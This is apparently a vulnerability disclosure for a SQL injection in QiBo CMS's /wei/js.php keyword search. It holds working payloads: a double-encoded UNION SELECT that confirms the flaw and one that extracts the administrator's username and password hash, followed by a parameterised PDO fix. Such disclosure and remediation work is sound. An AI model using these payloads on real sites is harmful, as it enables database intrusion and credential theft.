<ul><li>/wei/js.php</li></ul><pre class="">// Vulnerable branch of /wei/js.php as shown on the page; comments added for clarity
elseif($type=='like')
{
    $SQL.=" AND id!='$id' ";
    if(!$keyword)
    {
        // No keyword supplied: fall back to the stored keywords of the current item
        extract($db->get_one("SELECT keywords AS keyword FROM {$_pre}content WHERE id='$id'"));
    }
    if($keyword){
        $SQL.=" AND ( ";
        // urldecode() runs after any earlier input filtering, so a double-encoded
        // quote (%2527 -> %27 -> ') reaches the query intact
        $keyword=urldecode($keyword);
        $detail=explode(" ",$keyword);
        unset($detail2);
        foreach( $detail AS $key=>$value){
            // each term is concatenated into the LIKE pattern without escaping
            $detail2[]=" BINARY title LIKE '%$value%' ";
        }
        $str=implode(" OR ",$detail2);
        $SQL.=" $str ) ";
    }else{
        $SQL.=" AND 0 ";
    }
    $_INDEX=" USE INDEX ( list ) ";
    $ORDER=' list ';
}
</pre><p>The keyword is split on spaces and then imploded back into the SQL statement, causing SQL injection.</p><p>When the following payload is sent:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>the SQL statement executed is:</p><pre class="">SELECT * FROM qb_wei_content USE INDEX ( list ) WHERE fid IN ( 4,5,6 ) AND id!='0' AND ( BINARY title LIKE '%n%')UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#%' ) AND yz=1 ORDER BY list DESC LIMIT 7</pre><p>The page returns: </p><p><img alt="DFB28012-E968-45E0-B042-C9BEB3D84197.png" src="https://images.seebug.org/@/uploads/1434682839970-DFB28012-E968-45E0-B042-C9BEB3D84197.png" data-image-size="680,204" width="680" height="204"><br></p><p>This confirms that the vulnerability exists.</p><p>Sending the payload:</p><pre class="">f_id=4,5,6&keyword=n%%2527)UNION/**/SELECT/**/1,(select/**/concat(username,0x3a,password)from/**/qb_members/**/limit/**/1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51#</pre><p>to:</p><pre class="">http://10.211.55.3/qibo5/wei/js.php?type=like</pre><p>yields the administrator's username and password: </p><p><img alt="FE33D81D-4889-4517-BC40-2E219CE2E4F9.png" src="https://images.seebug.org/@/uploads/1434682879217-FE33D81D-4889-4517-BC40-2E219CE2E4F9.png" data-image-size="1584,402"><br></p>
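<p>The following is an added example, not QiBo's own code, showing how the keyword branch above can be rewritten so that search terms are bound as parameters instead of being concatenated into the query. It assumes a PDO connection (<code>$pdo</code>), a table name taken from configuration rather than from the request, and a MySQL backend whose default LIKE escape character is the backslash.</p>

```php
<?php
// Added example, not QiBo's own code: a parameterised rewrite of the
// type=like keyword branch. Assumes a PDO connection ($pdo) and a table
// name that comes from configuration, never from the request.

/**
 * Escape LIKE metacharacters so a search term is matched literally.
 * MySQL's default LIKE escape character is the backslash.
 */
function escapeLike(string $term): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $term);
}

/**
 * Build the " AND ( BINARY title LIKE ? OR ... ) " fragment from a
 * whitespace-separated keyword string. Returns [sqlFragment, params].
 * Only the static SQL skeleton is concatenated; every term is a bound value.
 */
function buildKeywordClause(string $keyword): array
{
    $terms = preg_split('/\s+/', trim($keyword), -1, PREG_SPLIT_NO_EMPTY);
    if ($terms === []) {
        return [' AND 0 ', []];   // same "match nothing" behaviour as the original
    }
    $parts  = [];
    $params = [];
    foreach ($terms as $term) {
        $parts[]  = 'BINARY title LIKE ?';
        $params[] = '%' . escapeLike($term) . '%';
    }
    return [' AND ( ' . implode(' OR ', $parts) . ' ) ', $params];
}

/**
 * Related-content query for type=like. $table is the configured
 * "{$_pre}content" name; $id is bound as an integer, terms as strings.
 */
function relatedByKeyword(PDO $pdo, string $table, int $id, string $keyword): array
{
    [$clause, $params] = buildKeywordClause($keyword);
    $sql = "SELECT * FROM {$table} USE INDEX (list) WHERE id != ? {$clause}"
         . " AND yz = 1 ORDER BY list DESC LIMIT 7";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    foreach ($params as $i => $value) {
        $stmt->bindValue($i + 2, $value, PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (DSN and credentials are assumptions for illustration):
// $pdo  = new PDO('mysql:host=127.0.0.1;dbname=qibo', $dbUser, $dbPass,
//                 [PDO::ATTR_EMULATE_PREPARES => false]);
// $rows = relatedByKeyword($pdo, 'qb_wei_content', (int)($_GET['id'] ?? 0),
//                          (string)($_GET['keyword'] ?? ''));
```

<p>Two points of the design matter here. No <code>urldecode()</code> is applied: PHP already decodes query parameters, and a second decode only reintroduces characters that an earlier filter removed, which is exactly what the double-encoded quote in the page's payload relies on. And because each term is a bound parameter with its <code>%</code> and <code>_</code> escaped, a keyword such as the one above is matched as a literal title substring and cannot close the LIKE pattern or append a UNION.</p>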